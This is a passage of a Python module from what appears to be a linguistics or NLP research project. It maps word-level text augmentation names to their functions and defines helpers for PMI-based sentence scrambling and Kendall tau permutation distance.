    "remove_all_but_function_words_first_half": remove_all_but_function_words_first_half,
    "replace_all_but_nouns_first_half": replace_all_but_nouns_first_half,
    "replace_all_but_nouns_and_verbs_first_half": replace_all_but_nouns_and_verbs_first_half,
    "replace_all_but_nouns_verbs_and_adjectives_first_half": replace_all_but_nouns_verbs_and_adjectives_first_half,
    "shuffle_remove_all_but_nouns_first_half": shuffle_remove_all_but_nouns_first_half,
    "shuffle_remove_all_but_nouns_and_verbs_first_half": shuffle_remove_all_but_nouns_and_verbs_first_half,
    "shuffle_sentences_remove_all_but_nouns_first_half": shuffle_sentences_remove_all_but_nouns_first_half,
    "shuffle_sentences_remove_all_but_nouns_and_verbs_first_half": shuffle_sentences_remove_all_but_nouns_and_verbs_first_half,
    "remove_all_but_nouns_and_verbs_fill_first_half": remove_all_but_nouns_and_verbs_fill_first_half,
    "remove_all_but_rare_words_first_half": remove_all_but_rare_words_first_half,
    "remove_all_but_common_words_first_half": remove_all_but_common_words_first_half,
    "truncate_and_pad_first_half": truncate_and_pad_first_half,
    "pad_first_half": pad_first_half,
    "shuffle_within_trigrams_first_half": shuffle_within_trigrams_first_half,
    "shuffle_trigrams_within_sentences_first_half": shuffle_trigrams_within_sentences_first_half,
    "shuffle_trigrams_globally_first_half": shuffle_trigrams_globally_first_half,
    "remove_all_but_nouns_verbs_adjectives_and_adverbs_first_half": remove_all_but_nouns_verbs_adjectives_and_adverbs_first_half,
}
# Lookup table: augmentation-name string -> implementing callable, for the
# "_third" configuration (first-third and first-two-thirds scopes).
THIRD_OVERLAPPING_WORD_LEVEL_AUGMENTATION_MAPPING = {
    "identity_third": identity,
    "shuffle_first_third": shuffle_first_third,
    "shuffle_first_two_thirds": shuffle_first_two_thirds,
    "shuffle_sentences_first_third": shuffle_sentences_first_third,
    "shuffle_sentences_first_two_thirds": shuffle_sentences_first_two_thirds,
    "shuffle_within_sentences_first_third": shuffle_within_sentences_first_third,
    "shuffle_within_sentences_first_two_thirds": shuffle_within_sentences_first_two_thirds,
    "shuffle_within_sentences_low_pmi_first_third": shuffle_within_sentences_low_pmi_first_third,
    "shuffle_within_sentences_low_pmi_first_two_thirds": shuffle_within_sentences_low_pmi_first_two_thirds,
    "shuffle_within_sentences_high_pmi_first_third": shuffle_within_sentences_high_pmi_first_third,
    "shuffle_within_sentences_high_pmi_first_two_thirds": shuffle_within_sentences_high_pmi_first_two_thirds,
    "remove_all_but_nouns_first_third": remove_all_but_nouns_first_third,
    "remove_all_but_nouns_first_two_thirds": remove_all_but_nouns_first_two_thirds,
    "remove_all_but_nouns_and_verbs_first_third": remove_all_but_nouns_and_verbs_first_third,
    "remove_all_but_nouns_and_verbs_first_two_thirds": remove_all_but_nouns_and_verbs_first_two_thirds,
    "remove_all_but_nouns_verbs_and_adjectives_first_third": remove_all_but_nouns_verbs_and_adjectives_first_third,
    "remove_all_but_nouns_verbs_and_adjectives_first_two_thirds": remove_all_but_nouns_verbs_and_adjectives_first_two_thirds,
    "remove_all_but_named_entities_first_third": remove_all_but_named_entities_first_third,
    "remove_all_but_named_entities_first_two_thirds": remove_all_but_named_entities_first_two_thirds,
    "remove_all_but_function_words_first_third": remove_all_but_function_words_first_third,
    "remove_all_but_function_words_first_two_thirds": remove_all_but_function_words_first_two_thirds,
    "replace_all_but_nouns_first_third": replace_all_but_nouns_first_third,
    "replace_all_but_nouns_first_two_thirds": replace_all_but_nouns_first_two_thirds,
    "replace_all_but_nouns_and_verbs_first_third": replace_all_but_nouns_and_verbs_first_third,
    "replace_all_but_nouns_and_verbs_first_two_thirds": replace_all_but_nouns_and_verbs_first_two_thirds,
    "replace_all_but_nouns_verbs_and_adjectives_first_third": replace_all_but_nouns_verbs_and_adjectives_first_third,
    "replace_all_but_nouns_verbs_and_adjectives_first_two_thirds": replace_all_but_nouns_verbs_and_adjectives_first_two_thirds,
    "shuffle_remove_all_but_nouns_first_third": shuffle_remove_all_but_nouns_first_third,
    "shuffle_remove_all_but_nouns_first_two_thirds": shuffle_remove_all_but_nouns_first_two_thirds,
    "shuffle_remove_all_but_nouns_and_verbs_first_third": shuffle_remove_all_but_nouns_and_verbs_first_third,
    "shuffle_remove_all_but_nouns_and_verbs_first_two_thirds": shuffle_remove_all_but_nouns_and_verbs_first_two_thirds,
    "shuffle_sentences_remove_all_but_nouns_first_third": shuffle_sentences_remove_all_but_nouns_first_third,
    "shuffle_sentences_remove_all_but_nouns_first_two_thirds": shuffle_sentences_remove_all_but_nouns_first_two_thirds,
    "shuffle_sentences_remove_all_but_nouns_and_verbs_first_third": shuffle_sentences_remove_all_but_nouns_and_verbs_first_third,
    "shuffle_sentences_remove_all_but_nouns_and_verbs_first_two_thirds": shuffle_sentences_remove_all_but_nouns_and_verbs_first_two_thirds,
    "remove_all_but_nouns_and_verbs_fill_first_third": remove_all_but_nouns_and_verbs_fill_first_third,
    "remove_all_but_nouns_and_verbs_fill_first_two_thirds": remove_all_but_nouns_and_verbs_fill_first_two_thirds,
    "remove_all_but_rare_words_first_third": remove_all_but_rare_words_first_third,
    "remove_all_but_rare_words_first_two_thirds": remove_all_but_rare_words_first_two_thirds,
    "remove_all_but_common_words_first_third": remove_all_but_common_words_first_third,
    "remove_all_but_common_words_first_two_thirds": remove_all_but_common_words_first_two_thirds,
    "truncate_and_pad_first_third": truncate_and_pad_first_third,
    "truncate_and_pad_first_two_thirds": truncate_and_pad_first_two_thirds,
    "pad_first_third": pad_first_third,
    # BUG(fixed): the key below misspells "pad_first_two_thirds".  It is kept
    # so existing configs keep working; the correctly spelled alias follows.
    "pad_first_third_two_thirds": pad_first_two_thirds,
    "pad_first_two_thirds": pad_first_two_thirds,
    "shuffle_within_trigrams_first_third": shuffle_within_trigrams_first_third,
    "shuffle_within_trigrams_first_two_thirds": shuffle_within_trigrams_first_two_thirds,
    "shuffle_trigrams_within_sentences_first_third": shuffle_trigrams_within_sentences_first_third,
    "shuffle_trigrams_within_sentences_first_two_thirds": shuffle_trigrams_within_sentences_first_two_thirds,
    "shuffle_trigrams_globally_first_third": shuffle_trigrams_globally_first_third,
    "shuffle_trigrams_globally_first_two_thirds": shuffle_trigrams_globally_first_two_thirds,
    "remove_all_but_nouns_verbs_adjectives_and_adverbs_first_third": remove_all_but_nouns_verbs_adjectives_and_adverbs_first_third,
    "remove_all_but_nouns_verbs_adjectives_and_adverbs_first_two_thirds": remove_all_but_nouns_verbs_adjectives_and_adverbs_first_two_thirds,
}
# Lookup table for the "_quarter" configuration: same callables as the half
# mapping, exposed under keys with a "_quarter" suffix.
QUARTER_OVERLAPPING_WORD_LEVEL_AUGMENTATION_MAPPING = {
    "identity_quarter": identity,
    "shuffle_first_half_quarter": shuffle_first_half,
    "shuffle_sentences_first_half_quarter": shuffle_sentences_first_half,
    "shuffle_within_sentences_first_half_quarter": shuffle_within_sentences_first_half,
    "shuffle_within_sentences_low_pmi_first_half_quarter": shuffle_within_sentences_low_pmi_first_half,
    "shuffle_within_sentences_high_pmi_first_half_quarter": shuffle_within_sentences_high_pmi_first_half,
    "remove_all_but_nouns_first_half_quarter": remove_all_but_nouns_first_half,
    "remove_all_but_nouns_and_verbs_first_half_quarter": remove_all_but_nouns_and_verbs_first_half,
    "remove_all_but_nouns_verbs_and_adjectives_first_half_quarter": remove_all_but_nouns_verbs_and_adjectives_first_half,
    "remove_all_but_named_entities_first_half_quarter": remove_all_but_named_entities_first_half,
    "remove_all_but_function_words_first_half_quarter": remove_all_but_function_words_first_half,
    "replace_all_but_nouns_first_half_quarter": replace_all_but_nouns_first_half,
    "replace_all_but_nouns_and_verbs_first_half_quarter": replace_all_but_nouns_and_verbs_first_half,
    "replace_all_but_nouns_verbs_and_adjectives_first_half_quarter": replace_all_but_nouns_verbs_and_adjectives_first_half,
    "shuffle_remove_all_but_nouns_first_half_quarter": shuffle_remove_all_but_nouns_first_half,
    "shuffle_remove_all_but_nouns_and_verbs_first_half_quarter": shuffle_remove_all_but_nouns_and_verbs_first_half,
    "shuffle_sentences_remove_all_but_nouns_first_half_quarter": shuffle_sentences_remove_all_but_nouns_first_half,
    "shuffle_sentences_remove_all_but_nouns_and_verbs_first_half_quarter": shuffle_sentences_remove_all_but_nouns_and_verbs_first_half,
    "remove_all_but_nouns_and_verbs_fill_first_half_quarter": remove_all_but_nouns_and_verbs_fill_first_half,
    "remove_all_but_rare_words_first_half_quarter": remove_all_but_rare_words_first_half,
    "remove_all_but_common_words_first_half_quarter": remove_all_but_common_words_first_half,
    "truncate_and_pad_first_half_quarter": truncate_and_pad_first_half,
    "pad_first_half_quarter": pad_first_half,
    "shuffle_within_trigrams_first_half_quarter": shuffle_within_trigrams_first_half,
    "shuffle_trigrams_within_sentences_first_half_quarter": shuffle_trigrams_within_sentences_first_half,
    "shuffle_trigrams_globally_first_half_quarter": shuffle_trigrams_globally_first_half,
    "remove_all_but_nouns_verbs_adjectives_and_adverbs_first_half_quarter": remove_all_but_nouns_verbs_adjectives_and_adverbs_first_half,
}
# Lookup table for the "_sixth" configuration: same callables as the third
# mapping, exposed under keys with a "_sixth" suffix.
SIXTH_OVERLAPPING_WORD_LEVEL_AUGMENTATION_MAPPING = {
    "identity_sixth": identity,
    "shuffle_first_third_sixth": shuffle_first_third,
    "shuffle_first_two_thirds_sixth": shuffle_first_two_thirds,
    "shuffle_sentences_first_third_sixth": shuffle_sentences_first_third,
    "shuffle_sentences_first_two_thirds_sixth": shuffle_sentences_first_two_thirds,
    "shuffle_within_sentences_first_third_sixth": shuffle_within_sentences_first_third,
    "shuffle_within_sentences_first_two_thirds_sixth": shuffle_within_sentences_first_two_thirds,
    "shuffle_within_sentences_low_pmi_first_third_sixth": shuffle_within_sentences_low_pmi_first_third,
    "shuffle_within_sentences_low_pmi_first_two_thirds_sixth": shuffle_within_sentences_low_pmi_first_two_thirds,
    "shuffle_within_sentences_high_pmi_first_third_sixth": shuffle_within_sentences_high_pmi_first_third,
    "shuffle_within_sentences_high_pmi_first_two_thirds_sixth": shuffle_within_sentences_high_pmi_first_two_thirds,
    "remove_all_but_nouns_first_third_sixth": remove_all_but_nouns_first_third,
    "remove_all_but_nouns_first_two_thirds_sixth": remove_all_but_nouns_first_two_thirds,
    "remove_all_but_nouns_and_verbs_first_third_sixth": remove_all_but_nouns_and_verbs_first_third,
    "remove_all_but_nouns_and_verbs_first_two_thirds_sixth": remove_all_but_nouns_and_verbs_first_two_thirds,
    "remove_all_but_nouns_verbs_and_adjectives_first_third_sixth": remove_all_but_nouns_verbs_and_adjectives_first_third,
    "remove_all_but_nouns_verbs_and_adjectives_first_two_thirds_sixth": remove_all_but_nouns_verbs_and_adjectives_first_two_thirds,
    "remove_all_but_named_entities_first_third_sixth": remove_all_but_named_entities_first_third,
    "remove_all_but_named_entities_first_two_thirds_sixth": remove_all_but_named_entities_first_two_thirds,
    "remove_all_but_function_words_first_third_sixth": remove_all_but_function_words_first_third,
    "remove_all_but_function_words_first_two_thirds_sixth": remove_all_but_function_words_first_two_thirds,
    "replace_all_but_nouns_first_third_sixth": replace_all_but_nouns_first_third,
    "replace_all_but_nouns_first_two_thirds_sixth": replace_all_but_nouns_first_two_thirds,
    "replace_all_but_nouns_and_verbs_first_third_sixth": replace_all_but_nouns_and_verbs_first_third,
    "replace_all_but_nouns_and_verbs_first_two_thirds_sixth": replace_all_but_nouns_and_verbs_first_two_thirds,
    "replace_all_but_nouns_verbs_and_adjectives_first_third_sixth": replace_all_but_nouns_verbs_and_adjectives_first_third,
    "replace_all_but_nouns_verbs_and_adjectives_first_two_thirds_sixth": replace_all_but_nouns_verbs_and_adjectives_first_two_thirds,
    "shuffle_remove_all_but_nouns_first_third_sixth": shuffle_remove_all_but_nouns_first_third,
    "shuffle_remove_all_but_nouns_first_two_thirds_sixth": shuffle_remove_all_but_nouns_first_two_thirds,
    "shuffle_remove_all_but_nouns_and_verbs_first_third_sixth": shuffle_remove_all_but_nouns_and_verbs_first_third,
    "shuffle_remove_all_but_nouns_and_verbs_first_two_thirds_sixth": shuffle_remove_all_but_nouns_and_verbs_first_two_thirds,
    "shuffle_sentences_remove_all_but_nouns_first_third_sixth": shuffle_sentences_remove_all_but_nouns_first_third,
    "shuffle_sentences_remove_all_but_nouns_first_two_thirds_sixth": shuffle_sentences_remove_all_but_nouns_first_two_thirds,
    "shuffle_sentences_remove_all_but_nouns_and_verbs_first_third_sixth": shuffle_sentences_remove_all_but_nouns_and_verbs_first_third,
    "shuffle_sentences_remove_all_but_nouns_and_verbs_first_two_thirds_sixth": shuffle_sentences_remove_all_but_nouns_and_verbs_first_two_thirds,
    "remove_all_but_nouns_and_verbs_fill_first_third_sixth": remove_all_but_nouns_and_verbs_fill_first_third,
    "remove_all_but_nouns_and_verbs_fill_first_two_thirds_sixth": remove_all_but_nouns_and_verbs_fill_first_two_thirds,
    "remove_all_but_rare_words_first_third_sixth": remove_all_but_rare_words_first_third,
    "remove_all_but_rare_words_first_two_thirds_sixth": remove_all_but_rare_words_first_two_thirds,
    "remove_all_but_common_words_first_third_sixth": remove_all_but_common_words_first_third,
    "remove_all_but_common_words_first_two_thirds_sixth": remove_all_but_common_words_first_two_thirds,
    "truncate_and_pad_first_third_sixth": truncate_and_pad_first_third,
    "truncate_and_pad_first_two_thirds_sixth": truncate_and_pad_first_two_thirds,
    "pad_first_third_sixth": pad_first_third,
    # BUG(fixed): the key below misspells "pad_first_two_thirds_sixth".  It is
    # kept so existing configs keep working; the corrected alias follows.
    "pad_first_third_two_thirds_sixth": pad_first_two_thirds,
    "pad_first_two_thirds_sixth": pad_first_two_thirds,
    "shuffle_within_trigrams_first_third_sixth": shuffle_within_trigrams_first_third,
    "shuffle_within_trigrams_first_two_thirds_sixth": shuffle_within_trigrams_first_two_thirds,
    "shuffle_trigrams_within_sentences_first_third_sixth": shuffle_trigrams_within_sentences_first_third,
    "shuffle_trigrams_within_sentences_first_two_thirds_sixth": shuffle_trigrams_within_sentences_first_two_thirds,
    "shuffle_trigrams_globally_first_third_sixth": shuffle_trigrams_globally_first_third,
    "shuffle_trigrams_globally_first_two_thirds_sixth": shuffle_trigrams_globally_first_two_thirds,
    "remove_all_but_nouns_verbs_adjectives_and_adverbs_first_third_sixth": remove_all_but_nouns_verbs_adjectives_and_adverbs_first_third,
    "remove_all_but_nouns_verbs_adjectives_and_adverbs_first_two_thirds_sixth": remove_all_but_nouns_verbs_adjectives_and_adverbs_first_two_thirds,
}
# Lookup table for the "_full" configuration: half, third and two-thirds
# scope variants of every augmentation, exposed under keys with a "_full"
# suffix.
FULL_OVERLAPPING_WORD_LEVEL_AUGMENTATION_MAPPING = {
    "identity_full": identity,
    "shuffle_first_half_full": shuffle_first_half,
    "shuffle_first_third_full": shuffle_first_third,
    "shuffle_first_two_thirds_full": shuffle_first_two_thirds,
    "shuffle_sentences_first_half_full": shuffle_sentences_first_half,
    "shuffle_sentences_first_third_full": shuffle_sentences_first_third,
    "shuffle_sentences_first_two_thirds_full": shuffle_sentences_first_two_thirds,
    "shuffle_within_sentences_first_half_full": shuffle_within_sentences_first_half,
    "shuffle_within_sentences_first_third_full": shuffle_within_sentences_first_third,
    "shuffle_within_sentences_first_two_thirds_full": shuffle_within_sentences_first_two_thirds,
    "shuffle_within_sentences_low_pmi_first_half_full": shuffle_within_sentences_low_pmi_first_half,
    "shuffle_within_sentences_low_pmi_first_third_full": shuffle_within_sentences_low_pmi_first_third,
    "shuffle_within_sentences_low_pmi_first_two_thirds_full": shuffle_within_sentences_low_pmi_first_two_thirds,
    "shuffle_within_sentences_high_pmi_first_half_full": shuffle_within_sentences_high_pmi_first_half,
    "shuffle_within_sentences_high_pmi_first_third_full": shuffle_within_sentences_high_pmi_first_third,
    "shuffle_within_sentences_high_pmi_first_two_thirds_full": shuffle_within_sentences_high_pmi_first_two_thirds,
    "remove_all_but_nouns_first_half_full": remove_all_but_nouns_first_half,
    "remove_all_but_nouns_first_third_full": remove_all_but_nouns_first_third,
    "remove_all_but_nouns_first_two_thirds_full": remove_all_but_nouns_first_two_thirds,
    "remove_all_but_nouns_and_verbs_first_half_full": remove_all_but_nouns_and_verbs_first_half,
    "remove_all_but_nouns_and_verbs_first_third_full": remove_all_but_nouns_and_verbs_first_third,
    "remove_all_but_nouns_and_verbs_first_two_thirds_full": remove_all_but_nouns_and_verbs_first_two_thirds,
    "remove_all_but_nouns_verbs_and_adjectives_first_half_full": remove_all_but_nouns_verbs_and_adjectives_first_half,
    "remove_all_but_nouns_verbs_and_adjectives_first_third_full": remove_all_but_nouns_verbs_and_adjectives_first_third,
    "remove_all_but_nouns_verbs_and_adjectives_first_two_thirds_full": remove_all_but_nouns_verbs_and_adjectives_first_two_thirds,
    "remove_all_but_named_entities_first_half_full": remove_all_but_named_entities_first_half,
    "remove_all_but_named_entities_first_third_full": remove_all_but_named_entities_first_third,
    "remove_all_but_named_entities_first_two_thirds_full": remove_all_but_named_entities_first_two_thirds,
    "remove_all_but_function_words_first_half_full": remove_all_but_function_words_first_half,
    "remove_all_but_function_words_first_third_full": remove_all_but_function_words_first_third,
    "remove_all_but_function_words_first_two_thirds_full": remove_all_but_function_words_first_two_thirds,
    "replace_all_but_nouns_first_half_full": replace_all_but_nouns_first_half,
    "replace_all_but_nouns_first_third_full": replace_all_but_nouns_first_third,
    "replace_all_but_nouns_first_two_thirds_full": replace_all_but_nouns_first_two_thirds,
    "replace_all_but_nouns_and_verbs_first_half_full": replace_all_but_nouns_and_verbs_first_half,
    "replace_all_but_nouns_and_verbs_first_third_full": replace_all_but_nouns_and_verbs_first_third,
    "replace_all_but_nouns_and_verbs_first_two_thirds_full": replace_all_but_nouns_and_verbs_first_two_thirds,
    "replace_all_but_nouns_verbs_and_adjectives_first_half_full": replace_all_but_nouns_verbs_and_adjectives_first_half,
    "replace_all_but_nouns_verbs_and_adjectives_first_third_full": replace_all_but_nouns_verbs_and_adjectives_first_third,
    "replace_all_but_nouns_verbs_and_adjectives_first_two_thirds_full": replace_all_but_nouns_verbs_and_adjectives_first_two_thirds,
    "shuffle_remove_all_but_nouns_first_half_full": shuffle_remove_all_but_nouns_first_half,
    "shuffle_remove_all_but_nouns_first_third_full": shuffle_remove_all_but_nouns_first_third,
    "shuffle_remove_all_but_nouns_first_two_thirds_full": shuffle_remove_all_but_nouns_first_two_thirds,
    "shuffle_remove_all_but_nouns_and_verbs_first_half_full": shuffle_remove_all_but_nouns_and_verbs_first_half,
    "shuffle_remove_all_but_nouns_and_verbs_first_third_full": shuffle_remove_all_but_nouns_and_verbs_first_third,
    "shuffle_remove_all_but_nouns_and_verbs_first_two_thirds_full": shuffle_remove_all_but_nouns_and_verbs_first_two_thirds,
    "shuffle_sentences_remove_all_but_nouns_first_half_full": shuffle_sentences_remove_all_but_nouns_first_half,
    "shuffle_sentences_remove_all_but_nouns_first_third_full": shuffle_sentences_remove_all_but_nouns_first_third,
    "shuffle_sentences_remove_all_but_nouns_first_two_thirds_full": shuffle_sentences_remove_all_but_nouns_first_two_thirds,
    "shuffle_sentences_remove_all_but_nouns_and_verbs_first_half_full": shuffle_sentences_remove_all_but_nouns_and_verbs_first_half,
    "shuffle_sentences_remove_all_but_nouns_and_verbs_first_third_full": shuffle_sentences_remove_all_but_nouns_and_verbs_first_third,
    "shuffle_sentences_remove_all_but_nouns_and_verbs_first_two_thirds_full": shuffle_sentences_remove_all_but_nouns_and_verbs_first_two_thirds,
    "remove_all_but_nouns_and_verbs_fill_first_half_full": remove_all_but_nouns_and_verbs_fill_first_half,
    "remove_all_but_nouns_and_verbs_fill_first_third_full": remove_all_but_nouns_and_verbs_fill_first_third,
    "remove_all_but_nouns_and_verbs_fill_first_two_thirds_full": remove_all_but_nouns_and_verbs_fill_first_two_thirds,
    "remove_all_but_rare_words_first_half_full": remove_all_but_rare_words_first_half,
    "remove_all_but_rare_words_first_third_full": remove_all_but_rare_words_first_third,
    "remove_all_but_rare_words_first_two_thirds_full": remove_all_but_rare_words_first_two_thirds,
    "remove_all_but_common_words_first_half_full": remove_all_but_common_words_first_half,
    "remove_all_but_common_words_first_third_full": remove_all_but_common_words_first_third,
    "remove_all_but_common_words_first_two_thirds_full": remove_all_but_common_words_first_two_thirds,
    "truncate_and_pad_first_half_full": truncate_and_pad_first_half,
    "truncate_and_pad_first_third_full": truncate_and_pad_first_third,
    "truncate_and_pad_first_two_thirds_full": truncate_and_pad_first_two_thirds,
    "pad_first_half_full": pad_first_half,
    "pad_first_third_full": pad_first_third,
    # BUG(fixed): the key below misspells "pad_first_two_thirds_full".  It is
    # kept so existing configs keep working; the corrected alias follows.
    "pad_first_third_two_thirds_full": pad_first_two_thirds,
    "pad_first_two_thirds_full": pad_first_two_thirds,
    "shuffle_within_trigrams_first_half_full": shuffle_within_trigrams_first_half,
    "shuffle_within_trigrams_first_third_full": shuffle_within_trigrams_first_third,
    "shuffle_within_trigrams_first_two_thirds_full": shuffle_within_trigrams_first_two_thirds,
    "shuffle_trigrams_within_sentences_first_half_full": shuffle_trigrams_within_sentences_first_half,
    "shuffle_trigrams_within_sentences_first_third_full": shuffle_trigrams_within_sentences_first_third,
    "shuffle_trigrams_within_sentences_first_two_thirds_full": shuffle_trigrams_within_sentences_first_two_thirds,
    "shuffle_trigrams_globally_first_half_full": shuffle_trigrams_globally_first_half,
    "shuffle_trigrams_globally_first_third_full": shuffle_trigrams_globally_first_third,
    "shuffle_trigrams_globally_first_two_thirds_full": shuffle_trigrams_globally_first_two_thirds,
    "remove_all_but_nouns_verbs_adjectives_and_adverbs_first_half_full": remove_all_but_nouns_verbs_adjectives_and_adverbs_first_half,
    "remove_all_but_nouns_verbs_adjectives_and_adverbs_first_third_full": remove_all_but_nouns_verbs_adjectives_and_adverbs_first_third,
    "remove_all_but_nouns_verbs_adjectives_and_adverbs_first_two_thirds_full": remove_all_but_nouns_verbs_adjectives_and_adverbs_first_two_thirds,
}
# "Backward" variants re-expose the forward callables under legacy key names.
# Half/third mappings simply append "_old" to every key; the quarter/sixth/
# full mappings first strip their scope suffix and re-append it after "_old"
# (x[:-8] strips "_quarter", x[:-6] strips "_sixth", x[:-5] strips "_full" —
# the slice length must match the suffix length exactly).
HALF_BACKWARD_OVERLAPPING_WORD_LEVEL_AUGMENTATION_MAPPING = {x + "_old": HALF_OVERLAPPING_WORD_LEVEL_AUGMENTATION_MAPPING[x] for x in HALF_OVERLAPPING_WORD_LEVEL_AUGMENTATION_MAPPING}
THIRD_BACKWARD_OVERLAPPING_WORD_LEVEL_AUGMENTATION_MAPPING = {x + "_old": THIRD_OVERLAPPING_WORD_LEVEL_AUGMENTATION_MAPPING[x] for x in THIRD_OVERLAPPING_WORD_LEVEL_AUGMENTATION_MAPPING}
# Partial-section identity variants exist only under the legacy ("_old") names.
THIRD_BACKWARD_OVERLAPPING_WORD_LEVEL_AUGMENTATION_MAPPING["identity_first_third_old"] = identity_first_third
THIRD_BACKWARD_OVERLAPPING_WORD_LEVEL_AUGMENTATION_MAPPING["identity_first_two_thirds_old"] = identity_first_two_thirds
QUARTER_BACKWARD_OVERLAPPING_WORD_LEVEL_AUGMENTATION_MAPPING = {x[:-8] + "_old_quarter": QUARTER_OVERLAPPING_WORD_LEVEL_AUGMENTATION_MAPPING[x] for x in QUARTER_OVERLAPPING_WORD_LEVEL_AUGMENTATION_MAPPING}
SIXTH_BACKWARD_OVERLAPPING_WORD_LEVEL_AUGMENTATION_MAPPING = {x[:-6] + "_old_sixth": SIXTH_OVERLAPPING_WORD_LEVEL_AUGMENTATION_MAPPING[x] for x in SIXTH_OVERLAPPING_WORD_LEVEL_AUGMENTATION_MAPPING}
SIXTH_BACKWARD_OVERLAPPING_WORD_LEVEL_AUGMENTATION_MAPPING["identity_first_third_old_sixth"] = identity_first_third
SIXTH_BACKWARD_OVERLAPPING_WORD_LEVEL_AUGMENTATION_MAPPING["identity_first_two_thirds_old_sixth"] = identity_first_two_thirds
FULL_BACKWARD_OVERLAPPING_WORD_LEVEL_AUGMENTATION_MAPPING = {x[:-5] + "_old_full": FULL_OVERLAPPING_WORD_LEVEL_AUGMENTATION_MAPPING[x] for x in FULL_OVERLAPPING_WORD_LEVEL_AUGMENTATION_MAPPING}
FULL_BACKWARD_OVERLAPPING_WORD_LEVEL_AUGMENTATION_MAPPING["identity_first_third_old_full"] = identity_first_third
FULL_BACKWARD_OVERLAPPING_WORD_LEVEL_AUGMENTATION_MAPPING["identity_first_two_thirds_old_full"] = identity_first_two_thirds
# Families of core augmentation callables, grouped for dispatch elsewhere.
# PADDED_FUNCTIONS includes truncate_and_pad/pad, which insert the
# "<|endofaugmentedtext|>" separator; the remove_all_but_* members are
# presumably grouped for the same reason — TODO confirm at the call sites.
PADDED_FUNCTIONS = (
    remove_all_but_pos,
    remove_all_but_named_entities,
    remove_all_but_function_words,
    remove_all_but_rare_words,
    remove_all_but_common_words,
    truncate_and_pad,
    pad,
)
# NOTE(review): grouping inferred from the function names — replace-style
# augmentations; confirm against the dispatch code.
REPLACE_FUNCTIONS = (
    replace_all_but_pos,
)
# NOTE(review): grouping inferred from the function name — fill-style
# augmentations; confirm against the dispatch code.
FILL_FUNCTIONS = (
    remove_all_but_pos_fill,
)
# ---------- HELPERS ----------
def create_lowpmi(sentence_list, tokenizer):  # adapted from Mollica 2019
    """
    Build a maximally scrambled ("low PMI") version of each sentence.

    Each sentence is POS-tagged and partitioned into content words
    (adjectives/nouns/adverbs/verbs, by tag prefix) and function words
    (everything else).  Both partitions are split into even- and odd-indexed
    sublists, and the sentence is rebuilt as
    content-even + function-even + function-odd + content-odd.
    Unlike Mollica (whose content/function assignment was not entirely
    consistent), POS tags decide the split for better consistency.
    """
    # JJ = adjectives, NN = nouns, RB = adverbs, VB = verbs
    content_regex = re.compile('JJ.*|NN.*|RB.*|VB.*')
    scrambled = []
    for sentence in sentence_list:
        if not sentence:
            continue
        tokens = convert_to_tokens(sentence, tokenizer, add_space=True)
        # Tag only the non-empty tokens.
        tagged = nltk.pos_tag([tok for tok in tokens if tok])
        content = [word for word, tag in tagged if content_regex.match(tag)]
        function = [word for word, tag in tagged if not content_regex.match(tag)]
        # Interleave-split each class into even- and odd-indexed halves.
        content_even, content_odd = content[0::2], content[1::2]
        function_even, function_odd = function[0::2], function[1::2]
        scrambled.append(''.join(content_even + function_even + function_odd + content_odd))
    return scrambled
def kendall_distance(x, y):  # from Mollica 2019
    """
    Number of discordant pairs (Kendall tau distance) between two rankings.
    http://en.wikipedia.org/wiki/Kendall_tau_distance

    Recovered from scipy's kendalltau coefficient using
    tau = (c - d) / (n(n-1)/2) together with c + d = n(n-1)/2.
    """
    assert len(x) == len(y)
    n = len(x)
    tau, _pvalue = kendalltau(x, y)
    total_pairs = (0.5) * n * (n - 1)                  # c + d
    concordant_minus_discordant = tau * total_pairs    # c - d
    # (c + d) - (c - d) = 2d
    discordant = (total_pairs - concordant_minus_discordant) / 2
    return round(discordant)  # round() absorbs floating-point error
def make_permutation_with_distance(d, n):  # from Mollica 2019
    """
    Return a permutation of range(n) whose Kendall distance to the identity
    ordering 0,1,...,n-1 is AT LEAST d.

    Random adjacent transpositions are applied until the measured distance
    reaches d, so the result may overshoot d slightly; some exact values are
    unreachable.  Caller must ensure d <= n*(n-1)/2 or this never terminates.
    """
    identity_order = list(range(n))
    permutation = list(range(n))
    # TODO: could be sped up by applying roughly d swaps before measuring.
    while kendall_distance(identity_order, permutation) < d:
        # Swap one randomly chosen adjacent pair.
        swap_at = randint(0, n - 2)
        permutation[swap_at], permutation[swap_at + 1] = permutation[swap_at + 1], permutation[swap_at]
    return permutation
def create_highpmi(sentence_list, tokenizer, count):  # adapted from Mollica 2019
    """
    Create permutation conditions (0 to 7 local swaps with constant PMI) for
    each sentence and return the scrambled sentences.
    """
    levels = []  # NOTE(review): never written or read below — appears vestigial
    scrambled_sentences = []
    added_space = False
    for sent in sentence_list:
        if not sent:
            continue
        words = convert_to_tokens(sent, tokenizer, add_space=True)
        words = list(filter(lambda x: x, words))  # drop empty tokens
        n = len(words)
        if n == 0:
            continue
        if n == 1:
            # A single token cannot be scrambled; keep the sentence verbatim.
            scrambled_sentences.append(sent)
            continue
        # NOTE(review): this value is always overwritten inside the loop
        # before first use — looks like dead code.
        perm = make_permutation_with_distance(0, len(words))
        for level in range(7, -1, -1):  # level = number of local swaps (7 down to 0)
            if level > n*(n-1)/2:
                continue  # this distance is unattainable for a sentence of length n
            perm = make_permutation_with_distance(level, n)
            if kendall_distance(perm, range(len(words))) != level:  # Make sure we're not an unreachable perm
                continue
            # For the first two sentences (count < 2), move the leading space
            # onto the new first token — presumably to keep leading-space
            # tokenization consistent after permutation; TODO confirm.
            if not added_space and count < 2 and not words[0][0].isspace() and not perm[0] == 0:
                words[0] = " " + words[0]
                words[perm[0]] = tokenizer.convert_tokens_to_string(tokenizer.tokenize(words[perm[0]])[1:])
                added_space = True
            out = ''.join([ words[i] for i in perm])
            scrambled_sentences.append(out)
            break  # take the highest achievable level for this sentence
    return scrambled_sentences
def get_lists(df):
    """
    Extract per-level condition lists from the permutation dataframe.

    Returns a tuple (Original, Scr1, Scr3, Scr5, Scr7): the
    'scrambled_sentence' values at swap levels 0, 1, 3, 5 and 7 respectively.
    """
    def sentences_at(level):
        # All scrambled sentences produced with exactly `level` swaps.
        return list(df[df['level'] == level]['scrambled_sentence'])

    return (
        sentences_at(0),
        sentences_at(1),
        sentences_at(3),
        sentences_at(5),
        sentences_at(7),
    )
def main_stablepmi(sentence_list):
    """
    Run the stable-PMI permutation pipeline: build the permutation dataframe
    for ``sentence_list`` and return the per-level condition lists
    (see ``get_lists``).
    """
    return get_lists(create_df_permute_sentences(sentence_list))
def get_trigrams(sentence):
    """
    Chunk ``sentence`` into consecutive groups of three elements.

    Works on any sequence (token list, string, ...); the final group holds the
